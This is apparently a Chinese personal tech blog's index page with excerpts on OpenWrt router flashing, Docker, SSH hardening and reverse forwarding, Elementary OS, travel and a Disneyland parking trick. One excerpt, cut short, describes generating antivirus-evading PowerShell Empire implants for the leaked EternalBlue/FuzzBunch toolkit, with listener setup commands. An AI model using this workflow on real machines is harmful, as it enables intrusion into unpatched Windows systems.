LINKSYS WRT1900ACS 2018再次刷机记

2016年的时候,写过一篇LINKSYS WRT1900ACS 刷机记,广受好评,为什么这么说呢,因为Google一下发现很多网站整篇摘抄了过去。昨日,OpenWrt发布了和LEDE合并后的第一个稳定版18.06。随着扶墙技术的发展,配置方法也简便许多,另外这两年也发现了其他一些有趣的扩展,所以重新记录一下配置过程。 1.更新ROM LINKSYS WRT1900ACS这货的设计非常奇特,它有两个系统区,每次刷机,都是刷到非正在使用的那个分区里去,以保证如果刷新失败还可以退回到之前的系统里,倒也安全。注意,更新版本必须使用linksys-wrt1900acs-squashfs-sysupgrade.bin这个包,而不是linksys-wrt1900acs-squashfs-factory.img这个包,下载地址为 https://downloads.openwrt.org/releases/18.06.0/targets/mvebu/cortexa9/ 刷机在Luci页面里即可完成,记得选择不保存设置。 2.打开Wi-Fi 系统默认是关闭Wi-Fi的,如何打开这里不再冗述,我仅仅微调了发射功率,把它开到了最高。 3.设置无污染DNS…

Docker化你的所有Web服务

不是为了别的,就是想试试能多大程度的使用Docker来部署常用的Web服务,以及为我们带来了什么好处。我所常用的Web服务包括: 启用了HTTPS的Web服务。包括主页,博客,以及某站镜像 Ghost搭建的博客服务 科学上网服务 1.启用了HTTPS的Web服务 该服务除了使用nginx搭建基于80和443的服务外,很重要的是要定期维护来自于Let's Encrypt的免费SSL证书。而使用Docker后,就可以利用Docker内置的自动renew来完成证书更新工作了。我所使用的镜像是linuxserver/letsencrypt,命令如下: docker run --name=letsencrypt -v /home/tl/nginx:/config -e URL=tonylee.name -e EMAIL=tony1016@gmail.com -e SUBDOMAINS=veesp,story,so -e VALIDATION=http -p 80:80 -p…

简单的保护SSH登录安全的方法

搭建在互联网上的VPS经常被尝试SSH暴力破解,刷了LEDE的路由器也可能被攻入,如何能确保其安全呢?虽然有类似Krypton这样的二次验证平台可以保障登录安全,但是稍显麻烦,而且如果它宕机了岂不是登录不了了?? 其实有更简单的防护办法——mail。只需要在登录成功时发送一份电子邮件给你自己不就好了。设置方法很简单: 1.安装ssmtp 2.编辑/etc/ssmtp/ssmtp.conf文件设置账户信息 root=xxx@qq.com mailhub=smtp.qq.com rewriteDomain=qq.com hostname=tonylee.name UseSTARTTLS=Yes AuthUser=xxx@qq.com AuthPass=pass FromLineOverride=yes 以及/etc/ssmtp/revaliases本地账户发件邮箱关联 root:xxx@qq.com:…

上海迪士尼两元停车大法

因为家在张江,娃又小,所以经常去迪士尼小镇遛娃。但是遛娃一般也就两个小时,何必掏100块停车费呢。于是让我摸索出一套两元停车大法。 1.从度假区高架路进入停车场下客 从度假区高架路下来后,直接进入停车场方向。停车场其实支持上下客即走的,只要入口处说明即可。在这里把家里老小全部放下,让他们先愉快的玩耍起来。 2.开车进入奕欧来购物村停车场 开车到奕欧来购物村停车场,即上海迪士尼乐园P3停车场 3.领取5小时免费停车券 在奕欧来的星巴克顺一张消费单,到礼宾处换取5小时停车电子优惠券 4.乘坐国际旅游度假区1路到迪士尼地铁站 公交车一元,差不多5分钟一辆,很快的。到目的地也就5分钟。之后就可以和家里老小汇合了。 5.返程 返程就是反着走一遍,没什么特殊的。坐公交取车,刷停车电子优惠券出门。回到迪士尼停车场入口处说是接人就可以了。 6.经济效益 司机同志单程会多花30分钟,但是总体上只要两元钱。所以只是在迪士尼小镇逛逛的,可以省点银子了。 转帖请保留出处:https://story.tonylee.name/2017/10/09/…

用啥ngrok,用ssh解决大局域网反向端口转发问题

自从家里换了联通光纤后,联通就在我家宽带出口前搭了一个路由器,我家也彻底沦为192.168.1.0/24段的局域网了,带来的问题就是在外网无法访问家里的路由器。这对于刷了LEDE,有时候需要从外网直接管理使用路由器的我,觉得难受极了。周末有空,干脆解决这个问题。 在这之前,了解过一个ngrok项目,用于将局域网内的某一个地址的端口,映射到公网。但是研究了一下该软件,发现其在LEDE的源中,并不包含,我又是个懒的去编译的程序员,因此想看看有没有其他办法。 研究一下,发现其实程序员必备的SSH就有这个功能。SSH一共支持三种端口转发: 本地端口转发:就是客户端方的某个端口和服务器某个端口相连,这样访问客户端该端口,就相当于访问服务器端某个端口 远程端口转发:还是把客户端方的某个端口和服务器某个端口相连,只不过反向的,访问服务器端某个端口,就相当于访问到了客户端该端口 动态转发:SOCKS5代理模式,不多说了 更具体一些,可以参见这篇文章:https://blog.twofei.com/528/ 回到我的需求,我是希望访问VPS的某个端口,就相当于访问路由器的指定端口。比如我访问VPS的2222,就相当于访问路由器的22端口。所以是第二种:…

利用Empire桥接Metasploit和ShadowBroker发布的FuzzBunch

ShadowBroker发布的FuzzBunch一石激起千层浪。Windows从XP到8无一幸免,真可谓腥风血雨。我自然也免不了要尝鲜,确实味道不错。但是在使用工具时有个问题,msfvenom直接生成的dll小马儿植入Windows 7后,会导致Windows重启,这对于我这个Metasploit粉来说,不可接受,但也无奈。 后来各种利用手段层出不穷,让我认识到,除了使用DanderSpritz外,Empire也可以生成马儿。 Empire,https://www.powershellempire.com/,一个PowerShell的马儿控制器。因为是PowerShell,所以基本免杀。 Empire的安装,基本上就是clone下来,然后运行 sudo ./setup/install.sh sudo ./empire 1.Empire生成马儿 首先建立Listenr listeners set Name Eternalblue set Host http://10.11.1.16 set Port 5555…

创建项目管理标准文档目录结构项目

一直觉得组织项目文档是一个让人头疼的事情。堆在一起吧,太乱;建立几个目录吧,建立的不科学又难以找到。我是觉得,大千世界肯定已经有人做了这样一个项目,规范了文档目录结构,结果在我忍无可忍的那一天,还是没有找到一个可以开箱即用的项目,于是就打算自己做一个了。 DUANG,项目地址如下:https://github.com/tony1016/PM-Standard-Documents-Directory 项目名字还是很cool的,感觉像是什么标准委员会似的。欢迎大家fork和Pull Request。 参考资料: 项目管理文档目录结构…

Elementary OS 初印象

过年了,没事做,把我的Macbook Pro Retina重新装了系统。顺便留了20G空间,打算装个第二系统。装什么还没想好,先用rEFInd,把引导搞定。记得有个系统叫Elementary OS,长得还挺漂亮,要不要试一试?? 1.初印象 Elementary OS是基于Ubuntu定制的系统,一切都很有特色,一切都以简洁为主 其预装软件也很有意思,没有一个按常理出牌的: 浏览器是Epiphany 邮件客户的是Geary 编辑器是Scratch 有意思,我就喜欢尝试新鲜的东西。 2.开机配置 开机后,在我的Retina上,各种硬件都工作正常。 20170119:想补充的是,Retina屏幕也毫无问题阿 不能开机即用的,是Linux的老梗——中文输入法,而且竟然都没有地方配置的,这也太简洁了。没办法,自己安ibus吧。 sudo apt install ibus sudo apt install ibus-libpinyin…

LINKSYS WRT1900ACS 刷机记

双十一的时候,趁马云家LINKSYS WRT1900ACS打折,优惠价969软妹币+6期免息分期,剁手入了这货。原价基本上在1300软妹币左右,还是很划算的。 先说说我现在的家庭网络系统。目前我用NETGEAR WNDR4300来翻墙,也曾经写过一篇教程来介绍如何通过刷OpenWrt来实现免设置科学上网。但是这货的信号很一般,我使用Plex做内网媒体播放,在卧室看电影时,时有卡顿发生。后来就在下级挂了一个小米路由器3,利用USB口做NAS。但是还是很不满意,一个是信号也一般,毕竟100来块钱的东西,二是支持的文件系统不可以扩充,三是下挂路由器的方案心理上总感觉不够简洁。遂有了买买买的冲动。 说一说LINKSYS WRT1900ACS这货吧,心仪很久了。AC的网络就不说了,双核1.6G的CPU,128M的闪存+512M的内存,简直牛逼的不要不要的。另外要说WRT1900系列一共有三个型号:V1,V2,S,S是目前最高的。AC系列之所以入法眼,除了其配置之外,还因为其厂家明确表示支持OpenWrt,因此不会存在驱动无法解决的问题,好评如潮。 到手后没有立即开箱,抱着侥幸的心里,挂在2淘宝上+200想试试能不能卖掉,结果一周后没有得偿所愿,遂开箱自用了。因为之前为NETGEAR…

2016十月瑞士行(更新完毕)

9月27日 出发,香港中转 写在出发前 晚上就要出发了,现在还在办公桌前。忽然想用另一种方式写游记:不如尝试一次实时更新??就在这个页面 游记何必那么面面具到,坐下来喝杯咖啡的时间就可以写一段心情。富士相机的WiFi功能也可以保证照片的质量。就这么决定了。 解释一下我如何实现实时更新的。我用的博客平台是ghost,在安卓上可以使用软件Quill进行同步编写直接发布。照片用富士相机的软件可以直接从相机无线拷贝到手机中。然后用snapseed转换一下大小,就可以直接使用了,我一般不做修图 从浦东到香港中转 六点准时到达浦东机场,空空如也的机场,一点也没国际范 十点钟,香港上空,灯火辉煌 现在,来香港购物已经没有几年前的大呼过瘾,因为有淘宝 当然,香港机场依然是the best 十二点,苏黎世从这里出发 9月28日 苏黎世 当地时间临晨六点,飞抵苏黎世上空 苏黎世机场一派德国建筑味道味道,钢筋水泥 顺着指示牌拿车去 我预订的是一辆奔驰A-Class,给我了一辆因菲尼迪,还不错,比奔驰带劲 驱车赶往Ramada Zurich Hotel 酒店要三点才能入住,…